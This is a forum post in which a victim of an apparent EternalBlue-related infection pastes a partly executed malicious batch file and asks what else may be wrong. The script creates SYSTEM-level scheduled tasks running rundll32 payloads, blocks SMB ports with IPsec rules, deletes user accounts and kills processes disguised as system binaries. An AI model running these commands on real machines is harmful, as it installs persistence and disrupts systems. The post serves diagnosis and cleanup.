New
#1
Hit with a partial of the eternalblue attack
Had something from mysking.
This caused the following partially executed bat file to show up:
ping 127.0.0.1 -n 10
net1 user IISUSER$ /del&net1 user IUSR_Servs /del
cacls c:\windows\twain_32\csrss.exe /e /d system&cacls c:\windows\twain_32\csrss.exe /e /d everyone&del c:\windows\twain_32\*.*
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system" /sc onstart /F
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && net start SharedAccess && netsh firewall set opmode mode=enable && netsh firewall set portopening protocol = ALL port = 445 name = 445 mode = DISABLE scope = ALL profile = ALL
@Wmic Process Where "Name='winlogon.exe' And ExecutablePath='C:\Windows\system\winlogon.exe'" Call Terminate &del C:\Windows\system\winlogon.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\system\svchost.exe'" Call Terminate &del C:\Windows\system\svchost.exe
@Wmic Process Where "Name='svchost.exe' And ExecutablePath='C:\Windows\twain_32\svchost.exe'" Call Terminate &del C:\Windows\twain_32\svchost.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\twain_32\csrss.exe'" Call Terminate &del C:\Windows\twain_32\csrss.exe
@Wmic Process Where "Name='csrss.exe' And ExecutablePath='C:\Windows\tasks\csrss.exe'" Call Terminate &del C:\Windows\tasks\csrss.exe
del c:\windows\debug\c2.bat
exit
I think I have a fair bit of it taken care of manually, but are there additional not immediately apparent issues?